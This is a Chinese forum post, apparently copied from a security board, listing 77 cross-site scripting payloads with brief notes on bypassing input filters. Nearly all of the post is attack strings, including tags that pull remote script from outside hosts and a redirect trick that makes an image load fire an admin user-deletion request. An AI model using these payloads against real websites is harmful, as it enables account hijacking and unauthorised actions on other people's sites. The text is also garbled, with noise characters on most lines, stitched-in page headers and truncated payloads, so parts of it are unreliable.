貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。& o1 A; T0 J" @1 @
(1)普通的XSS JavaScript注入! ?# m4 m7 m' j) ~3 S+ v
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>2 e# J6 U( M* K
(2)IMG标签XSS使用JavaScript命令: m$ J3 F: b/ [& W, o. q+ v
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! l# {( Q' S/ W+ o(3)IMG标签无分号无引号
" ?! d8 |) b9 d<IMG SRC=javascript:alert(‘XSS’)>; C* b+ C' Q( |, u E0 C
(4)IMG标签大小写不敏感5 F, L% g& a/ E# n
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>% Z/ z4 J# y0 S$ }! y
(5)HTML编码(必须有分号)7 J! u5 M, ~7 V8 u0 X6 L9 v1 t
<IMG SRC=javascript:alert(“XSS”)>
1 ?6 ]; z3 I. }, ?2 Z(6)修正缺陷IMG标签
9 S& {. T) Q+ W( \$ K4 i% Y<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
3 d% K+ D. z# W7 U+ ]$ m3 h6 B3 B, u# o
4 R1 k2 E9 A3 @: ?4 W(7)formCharCode标签(计算器)
2 n: B2 x3 W6 P<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 s. s9 Y: R5 e t" ]5 k(8)UTF-8的Unicode编码(计算器)
4 Z, }+ O* W6 m% Y9 M1 V& e<IMG SRC=jav..省略..S')>
* {! W1 C% _$ v1 ]% r+ `6 h+ q# ~! f(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
3 k% v, ^( z0 X0 A( p" ~! V% m<IMG SRC=jav..省略..S')>" N4 s! A: n% r+ Y0 ? n+ U
(10)十六进制编码也是没有分号(计算器)
$ @3 p) N; L; L5 A3 E0 e( t<IMG SRC=java..省略..XSS')>
+ g- N7 o& m2 Q& {, _(11)嵌入式标签,将Javascript分开
. Q9 y6 S; m9 W1 D) X: t* D<IMG SRC=”jav ascript:alert(‘XSS’);”>+ t- {( E- w" x/ F! f) x& y- A
(12)嵌入式编码标签,将Javascript分开* w ~1 B1 c4 U) |* Y* i8 y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
" ?8 G, l, \3 D& }6 A(13)嵌入式换行符; M) q ]/ u: v) B4 V' v" g. w. s9 B3 I
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 g" f/ w3 }! m1 ~# C3 T% e(14)嵌入式回车
5 O) k, L. B0 z<IMG SRC=”jav ascript:alert(‘XSS’);”>" t: X+ U+ s! b6 x
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 v) R- ]$ S# m9 w; W) {1 l% z<IMG SRC=”javascript:alert(‘XSS‘)”>
0 L7 Y3 A5 Y6 g( {+ r" i(16)解决限制字符(要求同页面)
; ?- s7 v6 k, R! J2 f<script>z=’document.’</script>8 W( o. I/ V/ Q, V# I) E
<script>z=z+’write(“‘</script>; A* \+ }, D; j6 _- U' b2 X
<script>z=z+’<script’</script>/ r! l8 J* t- R5 m+ |
<script>z=z+’ src=ht’</script>% d: ?& `/ o4 k
<script>z=z+’tp://ww’</script>" w* R Y$ j% {* Y9 v
<script>z=z+’w.shell’</script>% I4 ?! G3 x+ T* U
<script>z=z+’.net/1.’</script>( c1 y( R# t. u4 o# B9 y& Q" M% N* V0 r* D
<script>z=z+’js></sc’</script>
! C. B5 i0 T8 C+ H9 Y. U<script>z=z+’ript>”)’</script>% Y- B% y) W! @0 Q( x" h
<script>eval_r(z)</script>
+ x# H: V) P: `9 l(17)空字符12-7-1 T00LS - Powered by Discuz! Board
8 C+ Y# @& |! q) j5 @+ u" j9 shttps://www.t00ls.net/viewthread ... table&tid=15267 2/63 }0 Y: Y6 K* ?' }( Q& Y( D
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
( {" z. z+ U% ]2 e6 y' u# n( C(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用' x0 D2 @3 Z \. {% X
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
7 e% C3 g# @0 V(19)Spaces和meta前的IMG标签& L& Q, `9 \" Q
<IMG SRC=” javascript:alert(‘XSS’);”>: F3 S2 y) w* Z, R* _. ~5 n
(20)Non-alpha-non-digit XSS' y+ G0 F a+ G' p! s+ S$ ~$ M! y
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" J0 [ v: z3 d$ i G( I, j+ T/ b+ V(21)Non-alpha-non-digit XSS to 2
+ e; d4 l& w( W% ^5 g9 ~4 c0 f( L( _& U<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
; b) O, D' T6 O& Q0 v/ J(22)Non-alpha-non-digit XSS to 3) j" j, W0 }6 p. t+ ^9 e* }/ g
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 h; ]' Q! L/ ~(23)双开括号
s$ c K! Q# G9 j( l<<SCRIPT>alert(“XSS”);//<</SCRIPT>" }, r ]" w1 l( ^ C! x, v9 B
(24)无结束脚本标记(仅火狐等浏览器)
* {+ X0 P6 n) t# j+ O8 r( n& x<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
. C2 B4 ]# t+ @5 f% i2 o0 }(25)无结束脚本标记2
9 |6 t- S1 t2 V1 X ], e) C<SCRIPT SRC=//3w.org/XSS/xss.js>7 P U0 x8 i$ w; a
(26)半开的HTML/JavaScript XSS% q. N3 R" M b8 ^3 h) F z7 ?/ ^# K
<IMG SRC=”javascript:alert(‘XSS’)”
- [ W% Q( e3 n3 S(27)双开角括号
, \1 `9 Q5 M2 ^& t( s' ?<iframe src=http://3w.org/XSS.html <. ~$ J1 R* ~5 U3 O
(28)无单引号 双引号 分号. r# J; Q, H' z5 ]* f4 N
<SCRIPT>a=/XSS/
# X/ ~5 w, r# {' \alert(a.source)</SCRIPT>
; s. [" a9 |, Y: B+ Z(29)换码过滤的JavaScript
! s" O5 y: ?7 X3 Z\”;alert(‘XSS’);//- b2 U4 u- j) x$ X8 Q& z* X8 {
(30)结束Title标签
! W- F' C7 r6 o</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>3 T8 P3 S% L6 [3 H& _* E* w3 S# H. D
(31)Input Image
3 N9 {: B( b+ O2 m<INPUT SRC=”javascript:alert(‘XSS’);”>9 L! c) B. B; O
(32)BODY Image
7 Q' [" v1 F; n2 e- E<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
( x" }$ o* V6 {9 _6 e- A W, Y4 x(33)BODY标签7 x' _& a$ n& ^; P/ s$ P! D$ _
<BODY(‘XSS’)>
; M' K+ t& _2 {(34)IMG Dynsrc
+ Y# j' w8 T0 P4 e8 x<IMG DYNSRC=”javascript:alert(‘XSS’)”>3 j0 [9 m6 }2 K* R; |
(35)IMG Lowsrc# V" F' n& t7 h$ r
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
# d. ?" F: F9 _$ Q4 A1 i(36)BGSOUND6 x6 ~/ y+ B% l
<BGSOUND SRC=”javascript:alert(‘XSS’);”>7 h& j) k; J6 n1 e/ d% ], a1 [
(37)STYLE sheet/ @/ @. R# E8 y; {5 m& i% d
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- `. l2 ?4 A+ ] t' \- M, B(38)远程样式表
% r) l6 M$ H- E7 G8 B! l<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
7 D, Q% a9 i3 E$ z6 d(39)List-style-image(列表式)6 y f' i- V* e% c. l/ q
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS6 Q8 c/ ?" }7 \+ P2 s* S0 k
(40)IMG VBscript2 |: z# E& o. A5 t
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS$ @4 N m1 h0 k3 A6 A) d+ `% w
(41)META链接url
- d6 K6 N ~8 L+ s& v4 N6 s7 C" w) p# ?1 z4 \' Z3 Z$ ^
: c9 Q$ E$ y9 Z# k) b<META HTTP-EQUIV=”refresh” CONTENT=”0;4 E! d9 h8 |, B/ s
URL=http://;URL=javascript:alert(‘XSS’);”>3 g3 S$ S- a9 e0 U+ z, O# b# P) z
(42)Iframe: T! D$ R( z, p8 A
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
: `& L3 N0 r8 I1 u: I+ G(43)Frame
7 Z, O* \8 s6 J<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board! O. b' f1 m" a% `0 K% R. T4 A8 Y
https://www.t00ls.net/viewthread ... table&tid=15267 3/6* Z$ j i* g% U: g9 [4 T C$ ?
(44)Table+ M% b F* p7 P( w$ d* T$ ?
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>1 r' h: B+ k8 ^
(45)TD7 ?) `4 j2 I7 t" C0 o
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”> M6 |& s2 ^' _. ?2 `' I
(46)DIV background-image* o/ Y. E- u. _$ i, W' I
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; i0 Z% X. J$ {9 O7 o. Z6 b0 p(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8 o m! G. \! H3 m. W
8&13&12288&65279)$ G: ?0 `8 N; U% I6 C
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
9 j$ j c+ a( d; y" J e+ H! v% t6 c(48)DIV expression
# ~% A) {0 K; H) z) S6 T u' I<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
7 Y7 E. x F* z(49)STYLE属性分拆表达
h3 d( M# e- ^1 `. G<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>5 n3 j6 [# y ^) S% I |
(50)匿名STYLE(组成:开角号和一个字母开头)5 d, a- i) h9 x! [. i1 f
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>* ^2 R% y* |2 X1 T2 f4 Z- v. n$ O, N
(51)STYLE background-image
* r/ v; b. V0 {$ _<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
9 x# Z$ h: ~( ^! ~CLASS=XSS></A>1 M2 b6 n7 Z4 a( P
(52)IMG STYLE方式# P1 G; S* I4 U, d: p& ~
exppression(alert(“XSS”))’>
8 V6 R9 K# `4 w(53)STYLE background
1 j, `( S4 R/ f<STYLE><STYLE
, d! G. X4 u' ztype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
x D/ k6 m% c$ ]% y(54)BASE
+ Z8 V/ U }5 l! n<BASE HREF=”javascript:alert(‘XSS’);//”>
: y+ j/ }2 n6 R K9 Z0 M(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS+ a1 z0 n! S7 u6 H- j
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
+ Z4 [! s( w6 W7 S4 K o(56)在flash中使用ActionScrpt可以混进你XSS的代码
^: Z) R% t% a4 K& o' Ea=”get”;7 @, y0 a4 u! K7 J( t& V2 h
b=”URL(\”";
8 ?2 F# f! _+ `) L, Hc=”javascript:”;
* p0 r O1 Y9 nd=”alert(‘XSS’);\”)”;
' W0 g, f7 X) @+ v, ]eval_r(a+b+c+d);
7 _# R3 r' W1 R+ w1 U3 X(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上6 X. Q) Y% i) Q: ?) [
<HTML xmlns:xss>- U; N' z" o7 J: _( q3 V
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>/ Z6 S# Y9 O; e" H
<xss:xss>XSS</xss:xss>
9 q/ m1 n8 E. J9 Q0 `# I</HTML>0 s* P: ]- F2 g
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, d' z" i: @+ ~" T4 v5 y% t8 z8 \<SCRIPT SRC=””></SCRIPT># \- _, J# D0 E# K8 m- O
(59)IMG嵌入式命令,可执行任意命令" h0 U3 z* ]+ R9 P4 i6 \; z
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
7 W) e) a' W6 G& [0 x(60)IMG嵌入式命令(a.jpg在同服务器)' s! X6 t4 R+ y5 K4 k+ R+ f+ L
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
7 f" F+ ~7 t) S. L2 ?(61)绕符号过滤
3 B3 }+ `& v. M2 z* p<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 q9 u j m0 S5 o0 U1 @
(62)) J# T- ?5 @/ w8 j' a" b6 \
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
( {( a; l8 z+ }0 [' E(63)( D' Y4 ?/ M/ a/ N, [4 C; V
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
2 E: Y6 a0 y. j1 t3 c# d$ o! G(64)
8 h5 ^# k4 q% b: n3 R, B' E<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
0 k% z: f6 h3 g. s6 T5 g6 ~+ D# [# G(65)) A9 j, J' y; B1 n4 f8 j, ^
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
% [4 G4 c4 D. h2 k; r' B(66)12-7-1 T00LS - Powered by Discuz! Board, v( P7 z3 c7 k0 U3 v2 _$ c8 i' T! H! @
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
: Z$ R+ s" a/ m! B4 z" ~<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ }5 X, [8 a$ h(67)1 N; m5 g& T; `3 p% q
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
' _( G6 w, Q$ u' ]/ }; |</SCRIPT>% g& H: `- ]1 D4 U) D
(68)URL绕行
7 ~, y5 G* H0 b: ^' G! q# E<A HREF=”http://127.0.0.1/”>XSS</A>2 J$ o/ `. ~, Y
(69)URL编码
' W6 n7 v! t6 Z7 S5 G6 Y6 s0 w& r<A HREF=”http://3w.org”>XSS</A>
8 |: R+ `3 \4 x/ d9 {# O(70)IP十进制5 G. L" i( U' s6 }+ c0 X
<A HREF=”http://3232235521″>XSS</A>
, e3 }7 G a# K3 L( E" N(71)IP十六进制
# S5 c3 v+ Z/ ?& `<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
/ S7 v. W9 [% U6 j. F- {8 c(72)IP八进制# b7 X8 b; m( m
<A HREF=”http://0300.0250.0000.0001″>XSS</A>9 s3 }4 f4 b$ ?5 K/ s; D
(73)混合编码
& R( g/ \& t7 q<A HREF=”h# Q. K! ]/ ^; Z& N
tt p://6 6.000146.0×7.147/”">XSS</A>
/ t' y; I" |. s W8 h9 E' i' M(74)节省[http:]3 K$ T/ O* o: b0 T$ L
<A HREF=”//www.google.com/”>XSS</A>
# z6 Y( y1 p! w- ?9 v0 ^: f7 z(75)节省[www]
6 p' D& P% @ W; s* S6 R<A HREF=”http://google.com/”>XSS</A>
; N) W3 `: N- o(76)绝对点绝对DNS
! z# {$ ~. a. _- I8 U) Y<A HREF=”http://www.google.com./”>XSS</A>( {8 v D4 x8 p4 ]' k1 {/ o5 q( O
(77)javascript链接+ G% }1 x& i$ t" t! |: N6 x9 H) U
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A># I" i* h% K& b& `
! F$ R' S9 v+ F& `. I
原文地址:http://fuzzexp.org/u/0day/?p=14
. q% n) ^( |+ ]8 i! G& \
/ y" c. e1 J& e6 z4 e% H |
发表于 2013-4-19 19:22:37
收藏
支持
反对